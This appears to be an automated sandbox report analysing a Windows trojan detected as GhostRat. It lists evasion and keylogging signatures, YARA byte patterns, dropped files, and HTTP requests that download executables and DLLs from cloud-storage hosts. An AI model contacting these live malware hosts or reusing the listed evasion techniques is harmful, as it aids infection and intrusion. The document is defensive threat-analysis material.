Edit tour

Windows Analysis Report
#U6c47#U8054#U652f#U4ed8.exe

Overview

General Information

Sample name:	#U6c47#U8054#U652f#U4ed8.exe renamed because original name is a hash value
Original sample name:	.exe
Analysis ID:	1592740
MD5:	eabc234727934ad76f332e7cfb28c80b
SHA1:	c89d84a40075a2c53da3be5eb17e3fd95d6b7cc8
SHA256:	5e1d7275b0abd484c15f186690db73c42e861311da3f5f048563636336933b4a
Tags:	exemalwaretrojanuser-Joker
Infos:

Detection

GhostRat

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected GhostRat

AI detected suspicious sample

Found direct / indirect Syscall (likely to bypass EDR)

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Reads the Security eventlog

Reads the System eventlog

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks for available system drives (often done to infect USB drives)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to dynamically determine API calls

Contains functionality to get notified if a device is plugged in / out

Contains functionality to query CPU information (cpuid)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Installs a global mouse hook

Installs a raw input device (often for capturing keystrokes)

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains sections with non-standard names

PE file does not import any functions

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: PSScriptPolicyTest Creation By Uncommon Process

Suricata IDS alerts with low severity for network traffic

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara signature match

Classification

Process Tree

System is w10x64

#U6c47#U8054#U652f#U4ed8.exe (PID: 3160 cmdline: "C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe" MD5: EABC234727934AD76F332E7CFB28C80B)

APP.exe (PID: 4176 cmdline: "C:\Program Files\Weekplus\APP.exe" MD5: 53F534B5BE5BD54C0BBD6168C510776E)

WmiPrvSE.exe (PID: 6564 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

WerFault.exe (PID: 5168 cmdline: C:\Windows\system32\WerFault.exe -u -p 3160 -s 2900 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

GamePlusPlus.exe (PID: 6276 cmdline: "C:\Program Files\Weekplus\GamePlusPlus.exe" 1 MD5: 8038EBB15EC202AD0A25564E55CDF32D)

GamePlusPlus.exe (PID: 6768 cmdline: vrdashboard.exe -duplication_gpu_check MD5: 8038EBB15EC202AD0A25564E55CDF32D)

GamePlusPlus.exe (PID: 1096 cmdline: vrdashboard.exe -duplication_gpu_check MD5: 8038EBB15EC202AD0A25564E55CDF32D)

GamePlusPlus.exe (PID: 5396 cmdline: vrdashboard.exe -duplication_gpu_check MD5: 8038EBB15EC202AD0A25564E55CDF32D)

WerFault.exe (PID: 5308 cmdline: C:\Windows\system32\WerFault.exe -u -p 6276 -s 1380 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

cleanup

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0xd1d53:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x14b10a:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0xd55d1:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB 0x14e988:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB

Dropped Files

Source	Rule	Description	Author	Strings
C:\Program Files\Weekplus\mpclient64.dat	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x3508:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x6a3e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
C:\Program Files\Weekplus\mpclient.dat	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x4bb08:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x4f03e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2564910730.000000001E430000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x3508:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x6a3e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
0000000A.00000002.2494156161.00000196FB690000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x4bb08:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x4f03e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
0000000A.00000002.2494581238.00000196FBA70000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000000.00000002.2566214596.00000000202C5000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x30cb8:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x341ee:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
0000000A.00000002.2493857823.00000196F9E07000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x6d3d8:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x7090e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
Process Memory Space: GamePlusPlus.exe PID: 6276	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
Click to see the 1 entries

Sigma Signatures

System Summary

Sigma detected: PSScriptPolicyTest Creation By Uncommon Process

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe, ProcessId: 3160, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2anqrhei.ivv.ps1

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-16T13:35:14.883198+0100	2803305	3	Unknown Traffic	192.168.2.6	49728	183.66.100.45	443	TCP
2025-01-16T13:35:17.098130+0100	2803305	3	Unknown Traffic	192.168.2.6	49745	183.66.100.45	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: #U6c47#U8054#U652f#U4ed8.exe	Virustotal: Detection: 28%			Perma Link
Source: #U6c47#U8054#U652f#U4ed8.exe	ReversingLabs: Detection: 15%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.7% probability

Machine Learning detection for dropped file

Source: C:\Program Files\Weekplus\APP.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: #U6c47#U8054#U652f#U4ed8.exe

Joe Sandbox ML: detected

Source: unknown	HTTPS traffic detected: 183.66.100.45:443 -> 192.168.2.6:49710 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 159.75.57.35:443 -> 192.168.2.6:49712 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 183.66.100.45:443 -> 192.168.2.6:49759 version: TLS 1.0

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Directory created: C:\Program Files\Weekplus	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Directory created: C:\Program Files\Weekplus\GamePlusPlus.exe	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Directory created: C:\Program Files\Weekplus\mpclient.dat	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Directory created: C:\Program Files\Weekplus\openvr_api.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Directory created: C:\Program Files\Weekplus\mpclient64.dat	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Directory created: C:\Program Files\Weekplus\steam_api64.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Directory created: C:\Program Files\Weekplus\APP.exe	Jump to behavior

Source: #U6c47#U8054#U652f#U4ed8.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: c:\users\administrator\documents\visual studio 2010\Projects\LMNK\LMNK\obj\x64\Release\LMNK.pdb source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2480965934.000000000599F000.00000004.00000800.00020000.00000000.sdmp, APP.exe, 00000003.00000000.2309175006.0000000000682000.00000002.00000001.01000000.00000007.sdmp, APP.exe.0.dr
Source:	Binary string: Microsoft.KeyDistributionService.Cmdlets.pdb source: WERA028.tmp.dmp.9.dr
Source:	Binary string: C:\Users\Administrator\documents\visual studio 2010\Projects\XMM556\XMM556\obj\x64\Release\XMM556.pdbmlb source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2630880406.0000000022BB8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdbw source: WERA028.tmp.dmp.9.dr
Source:	Binary string: System.Configuration.pdb` source: WERA028.tmp.dmp.9.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WERA028.tmp.dmp.9.dr
Source:	Binary string: \??\C:\Windows\exe\XMM556.pdb source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2630880406.0000000022C46000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WERA028.tmp.dmp.9.dr
Source:	Binary string: System.Core.ni.pdb source: WERA028.tmp.dmp.9.dr
Source:	Binary string: System.Numerics.ni.pdb source: WERA028.tmp.dmp.9.dr
Source:	Binary string: Microsoft.Management.Infrastructure.Native.ni.pdb source: WERA028.tmp.dmp.9.dr
Source:	Binary string: Microsoft.KeyDistributionService.Cmdlets.ni.pdb source: WERA028.tmp.dmp.9.dr
Source:	Binary string: XMM556.pdb source: WERA028.tmp.dmp.9.dr
Source:	Binary string: \??\C:\Users\user\Desktop\XMM556.pdb source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2636400963.0000000027560000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.Management.Infrastructure.Native.pdba$zzzdbg0 source: WERA028.tmp.dmp.9.dr
Source:	Binary string: mscorlib.ni.pdb source: WERA028.tmp.dmp.9.dr
Source:	Binary string: \??\C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.PDB,S source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2630880406.0000000022C82000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: symbols\exe\XMM556.pdb.pdb` source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2477120501.0000000002BF0000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.PDB source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2477120501.0000000002BF0000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WERA028.tmp.dmp.9.dr
Source:	Binary string: 0C:\Windows\XMM556.pdb source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2477120501.0000000002BF0000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: [180n1 #U6c47#U8054#U652f#U4ed8.PDB source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2477120501.0000000002BF0000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WERA028.tmp.dmp.9.dr
Source:	Binary string: C:\Windows\XMM556.pdbpdb556.pdbl source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2630880406.0000000022C46000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WERA028.tmp.dmp.9.dr
Source:	Binary string: System.Configuration.ni.pdb source: WERA028.tmp.dmp.9.dr
Source:	Binary string: Microsoft.KeyDistributionService.Cmdlets.ni.pdbRSDS source: WERA028.tmp.dmp.9.dr
Source:	Binary string: ".pdb source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2477120501.0000000002BF0000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdb source: WERA028.tmp.dmp.9.dr
Source:	Binary string: C:\Users\Administrator\documents\visual studio 2010\Projects\XMM556\XMM556\obj\x64\Release\XMM556.pdbp source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2477120501.0000000002BF0000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: indoC:\Windows\XMM556.pdb source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2477120501.0000000002BF0000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdb source: WERA028.tmp.dmp.9.dr
Source:	Binary string: System.pdb source: WERA028.tmp.dmp.9.dr
Source:	Binary string: System.Numerics.ni.pdbRSDSautg source: WERA028.tmp.dmp.9.dr
Source:	Binary string: C:\Users\user\Desktop\XMM556.pdb source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2477120501.0000000002BF0000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: WERA028.tmp.dmp.9.dr
Source:	Binary string: \??\C:\Windows\XMM556.pdb source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2630880406.0000000022C82000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\buildslave\steamvr_rel_hotfix_win64\build\src\vrdashboard\Retail\win64\2017\vrdashboard.pdb source: GamePlusPlus.exe, 0000000A.00000000.2448572659.00007FF646EA2000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 0000000A.00000002.2495342880.00007FF646EA2000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 0000000B.00000002.2466184660.00007FF646EA2000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 0000000B.00000000.2453259450.00007FF646EA2000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 0000000C.00000002.2465406124.00007FF646EA2000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 0000000C.00000000.2454237429.00007FF646EA2000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 0000000D.00000000.2456740595.00007FF646EA2000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 0000000D.00000002.2466011324.00007FF646EA2000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe.0.dr
Source:	Binary string: XMM556.pdbx source: WERA028.tmp.dmp.9.dr
Source:	Binary string: \??\C:\Windows\symbols\exe\XMM556.pdb source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2636400963.0000000027560000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\buildslave\steamvr_rel_hotfix_win64\build\src\vrdashboard\Retail\win64\2017\vrdashboard.pdbF%% source: GamePlusPlus.exe, 0000000A.00000000.2448572659.00007FF646EA2000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 0000000A.00000002.2495342880.00007FF646EA2000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 0000000B.00000002.2466184660.00007FF646EA2000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 0000000B.00000000.2453259450.00007FF646EA2000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 0000000C.00000002.2465406124.00007FF646EA2000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 0000000C.00000000.2454237429.00007FF646EA2000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 0000000D.00000000.2456740595.00007FF646EA2000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 0000000D.00000002.2466011324.00007FF646EA2000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe.0.dr
Source:	Binary string: System.Core.pdb source: WERA028.tmp.dmp.9.dr
Source:	Binary string: Microsoft.Management.Infrastructure.Native.pdb source: WERA028.tmp.dmp.9.dr
Source:	Binary string: C:\Users\Administrator\documents\visual studio 2010\Projects\XMM556\XMM556\obj\x64\Release\XMM556.pdb source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2630880406.0000000022BB8000.00000004.00000020.00020000.00000000.sdmp, #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2634863430.00000000274A2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.Management.Infrastructure.Native.ni.pdbRSDS source: WERA028.tmp.dmp.9.dr
Source:	Binary string: System.Numerics.pdb source: WERA028.tmp.dmp.9.dr
Source:	Binary string: c:\buildslave\steam_rel_client_win64\build\src\steam_api\win64\Release\steam_api64.pdb source: GamePlusPlus.exe, 0000000A.00000002.2495583395.00007FFD9B1B8000.00000002.00000001.01000000.0000000D.sdmp, GamePlusPlus.exe, 0000000B.00000002.2466518264.00007FFD9B1B8000.00000002.00000001.01000000.0000000D.sdmp, GamePlusPlus.exe, 0000000C.00000002.2465879563.00007FFD9B1B8000.00000002.00000001.01000000.0000000D.sdmp, GamePlusPlus.exe, 0000000D.00000002.2466433531.00007FFD9B1B8000.00000002.00000001.01000000.0000000D.sdmp, steam_api64.dll.0.dr
Source:	Binary string: System.ni.pdb source: WERA028.tmp.dmp.9.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WERA028.tmp.dmp.9.dr

Source: C:\Program Files\Weekplus\GamePlusPlus.exe	File opened: z:
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	File opened: x:
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	File opened: v:
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	File opened: t:
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	File opened: r:
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	File opened: p:
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	File opened: n:
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	File opened: l:
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	File opened: j:
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	File opened: h:
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	File opened: f:
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	File opened: b:
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	File opened: y:
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	File opened: w:
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	File opened: u:
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	File opened: s:
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	File opened: q:
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	File opened: o:
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	File opened: m:
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	File opened: k:
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	File opened: i:
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	File opened: g:
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	File opened: e:
Source: C:\Windows\System32\WerFault.exe	File opened: c:
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	File opened: [:

Source: C:\Program Files\Weekplus\GamePlusPlus.exe

Code function: 10_2_00007FF646E84790 GetModuleFileNameA,_invalid_parameter_noinfo_noreturn,strstr,GetStdHandle,WriteFile,CloseHandle,strstr,strstr,VR_InitInternal2,VR_IsInterfaceVersionValid,VR_GetGenericInterface,VR_GetGenericInterface,VR_GetGenericInterface,VR_GetGenericInterface,VR_GetGenericInterface,LoadLibraryA,GetProcAddress,VR_GetGenericInterface,VRControlPanel,LoadIconA,LoadCursorA,GetStockObject,RegisterClassA,CreateWindowExA,RegisterDeviceNotificationA,RegisterRawInputDevices,PeekMessageA,TranslateMessage,DispatchMessageA,PeekMessageA,VR_GetGenericInterface,UnregisterDeviceNotification,VR_ShutdownInternal,VR_ShutdownInternal,VR_GetVRInitErrorAsSymbol,_invalid_parameter_noinfo_noreturn,

10_2_00007FF646E84790

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: 0_2_00007FFDA55BA480 type_info::_name_internal_method,FindFirstFileExW,Concurrency::details::_Scheduler::_Scheduler,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,FindNextFileW,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,		0_2_00007FFDA55BA480
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00007FFD9B1AE20C FindFirstFileExW,		10_2_00007FFD9B1AE20C

Source: global traffic	HTTP traffic detected: GET /GamePlusPlus.exe HTTP/1.1Host: wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /mpclient.dat HTTP/1.1Host: www19daxcsdaf-1328031368.cos.ap-guangzhou.myqcloud.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /openvr_api.dll HTTP/1.1Host: wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.com
Source: global traffic	HTTP traffic detected: GET /mpclient64.dat HTTP/1.1Host: wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.com
Source: global traffic	HTTP traffic detected: GET /steam_api64.dll HTTP/1.1Host: wwwwgetmore-1328031368.cos.ap-chongqing.myqcloud.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /APP.exe HTTP/1.1Host: wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.comConnection: Keep-Alive

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49728 -> 183.66.100.45:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49745 -> 183.66.100.45:443

Source: unknown	HTTPS traffic detected: 183.66.100.45:443 -> 192.168.2.6:49710 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 159.75.57.35:443 -> 192.168.2.6:49712 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 183.66.100.45:443 -> 192.168.2.6:49759 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 149.115.250.19
Source: unknown	TCP traffic detected without corresponding DNS query: 149.115.250.19
Source: unknown	TCP traffic detected without corresponding DNS query: 149.115.250.19
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /GamePlusPlus.exe HTTP/1.1Host: wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /mpclient.dat HTTP/1.1Host: www19daxcsdaf-1328031368.cos.ap-guangzhou.myqcloud.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /openvr_api.dll HTTP/1.1Host: wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.com
Source: global traffic	HTTP traffic detected: GET /mpclient64.dat HTTP/1.1Host: wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.com
Source: global traffic	HTTP traffic detected: GET /steam_api64.dll HTTP/1.1Host: wwwwgetmore-1328031368.cos.ap-chongqing.myqcloud.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /APP.exe HTTP/1.1Host: wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.com
Source: global traffic	DNS traffic detected: DNS query: www19daxcsdaf-1328031368.cos.ap-guangzhou.myqcloud.com
Source: global traffic	DNS traffic detected: DNS query: wwwwgetmore-1328031368.cos.ap-chongqing.myqcloud.com

Source: steam_api64.dll.0.dr, GamePlusPlus.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2480965934.00000000059A3000.00000004.00000800.00020000.00000000.sdmp, #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2480965934.0000000005944000.00000004.00000800.00020000.00000000.sdmp, steam_api64.dll.0.dr, GamePlusPlus.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2480965934.00000000059A3000.00000004.00000800.00020000.00000000.sdmp, #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2480965934.0000000005944000.00000004.00000800.00020000.00000000.sdmp, steam_api64.dll.0.dr, GamePlusPlus.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2480965934.00000000059A3000.00000004.00000800.00020000.00000000.sdmp, #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2480965934.0000000005944000.00000004.00000800.00020000.00000000.sdmp, steam_api64.dll.0.dr, GamePlusPlus.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: steam_api64.dll.0.dr, GamePlusPlus.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2480965934.00000000059A3000.00000004.00000800.00020000.00000000.sdmp, #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2480965934.0000000005944000.00000004.00000800.00020000.00000000.sdmp, steam_api64.dll.0.dr, GamePlusPlus.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2480965934.00000000059A3000.00000004.00000800.00020000.00000000.sdmp, #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2480965934.0000000005944000.00000004.00000800.00020000.00000000.sdmp, steam_api64.dll.0.dr, GamePlusPlus.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: GamePlusPlus.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2480965934.00000000059A3000.00000004.00000800.00020000.00000000.sdmp, #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2480965934.0000000005944000.00000004.00000800.00020000.00000000.sdmp, steam_api64.dll.0.dr, GamePlusPlus.exe.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2510566311.0000000015989000.00000004.00000800.00020000.00000000.sdmp, APP.exe, 00000003.00000002.2397216375.000000001362F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2480965934.00000000059A3000.00000004.00000800.00020000.00000000.sdmp, #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2480965934.0000000005944000.00000004.00000800.00020000.00000000.sdmp, steam_api64.dll.0.dr, GamePlusPlus.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2480965934.00000000059A3000.00000004.00000800.00020000.00000000.sdmp, #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2480965934.0000000005944000.00000004.00000800.00020000.00000000.sdmp, steam_api64.dll.0.dr, GamePlusPlus.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: steam_api64.dll.0.dr, GamePlusPlus.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2480965934.00000000059A3000.00000004.00000800.00020000.00000000.sdmp, #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2480965934.0000000005944000.00000004.00000800.00020000.00000000.sdmp, steam_api64.dll.0.dr, GamePlusPlus.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
